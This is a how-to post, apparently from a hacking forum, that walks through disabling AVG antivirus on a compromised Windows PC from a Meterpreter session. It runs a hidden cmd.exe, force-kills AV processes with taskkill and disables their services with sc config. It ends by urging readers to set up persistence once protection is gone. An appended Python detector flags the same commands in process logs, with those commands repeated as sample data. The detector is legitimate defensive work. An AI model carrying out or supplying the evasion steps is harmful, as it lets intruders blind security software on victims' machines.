
How to Disable Antivirus Services After Getting a Meterpreter Session on a Remote PC

Mar 25, 2016 05:59 PM
Mar 25, 2016 06:11 PM

Hello Friends …

My name is Suresh Senarathna and this is my first "How-To" post.

Now I am going to show you how to stop all antivirus services after getting a meterpreter session on your victim.

(I'm using MS Windows XP as my victim OS and AVG Antivirus guard as an example.)

In a meterpreter session we can use the "killav" command to kill the AVG services running on the victim's PC, but it will not stop all of the running AVG services.

So we are going to use the "taskkill" command to stop all running AVG services.

1) First type:

execute -f cmd.exe -c -H

in the meterpreter terminal. It will execute a hidden cmd on our victim OS.

Then type:

interact n

(n = channel number) to interact with it.

Command line interface of Windows XP showing execution of a command.

2) Then type:

tasklist /SVC | find /I "avg"

to find which AVG services are running.

List of running processes related to AVG antivirus software on a Windows system.

3) After that, type:

taskkill /F /IM "avg"*

to kill those running services.

Command line output displaying process termination attempts and access denied errors.

But as you can see, not all of those services are terminated, because some of them restart themselves and cannot be stopped.

4) To verify it, type:

sc queryex (service name)

System process query output display showing RUNNING status for avpd and AVGDSAgent services.

5) So we have to stop those services from auto-starting. To do that, type:

sc config (service name) start= disabled

Command line output showing the disabling of AVG services on a Windows system.

6) Then run taskkill again:

taskkill /F /IM "avg"*

Command line output showing the termination of processes named 'nrgfix.exe' and 'angtray.exe' on a Windows system.

7) Finally type:

tasklist /SVC | find /I "avg"

to verify that all AVG services are terminated.

Command line interface showing Windows tasklist command output.

Now all the running and auto-starting AVG services are terminated.

So you can create persistence or do any other fun things without having any antivirus guard problem.

(P.S.: If I have done anything the wrong way, please correct me. Thanks for reading.)
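Seen from the defending side, the command sequence in steps 2 to 7 leaves a recognizable trail wherever process-creation logging records command lines. The following is an added example, not part of the original post: a small Python detector run over constructed command lines. The host names, the `PROTECTED` list, the rule names and the severity levels are assumptions.

```python
import re
from collections import defaultdict

# Assumption: name fragments of the security products to watch (the page's example is AVG).
PROTECTED = ("avg",)

# One pattern per step of the procedure. \s* accepts "start=disabled" and "start= disabled".
RULES = {
    "enumerate": re.compile(r"\btasklist(\.exe)?\b.*\s/svc\b|\bsc(\.exe)?\s+queryex\b", re.I),
    "forced_kill": re.compile(r"\btaskkill(\.exe)?\b(?=.*\s/f\b)(?=.*\s/im\b)", re.I),
    "service_disabled": re.compile(r"\bsc(\.exe)?\s+config\s+\S+.*\bstart=\s*disabled\b", re.I),
}
TAMPER = {"forced_kill", "service_disabled"}

def classify(cmdline):
    """Return the names of the rules that one command line matches."""
    hits = {name for name, rx in RULES.items() if rx.search(cmdline)}
    # A kill or a disable only counts when it names a protected product.
    if not any(p in cmdline.lower() for p in PROTECTED):
        hits -= TAMPER
    return hits

def detect(events):
    """events: iterable of (host, command_line). Returns {host: (severity, rules)}."""
    seen = defaultdict(set)
    for host, cmdline in events:
        seen[host] |= classify(cmdline)
    alerts = {}
    for host, hits in seen.items():
        if TAMPER <= hits:
            alerts[host] = ("high", sorted(hits))    # killed and prevented from restarting
        elif TAMPER & hits:
            alerts[host] = ("medium", sorted(hits))  # one tampering action on its own
    return alerts

# Constructed sample data: command lines as a process-creation log would record them.
SAMPLE_EVENTS = [
    ("ws-01", "tasklist /SVC"),
    ("ws-01", 'find /I "avg"'),
    ("ws-01", 'taskkill /F /IM "avg"*'),
    ("ws-01", "sc queryex AVGDSAgent"),
    ("ws-01", "sc config AVGDSAgent start= disabled"),
    ("ws-02", "taskkill /F /IM notepad.exe"),
    ("ws-02", "sc config Spooler start= disabled"),
    ("ws-03", "taskkill /IM avgui.exe /F"),
]

if __name__ == "__main__":
    for host, (severity, rules) in sorted(detect(SAMPLE_EVENTS).items()):
        print(host, severity, ", ".join(rules))
```

The substring match against `PROTECTED` is deliberately coarse, so tune the list to the service and process names of the products actually deployed.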
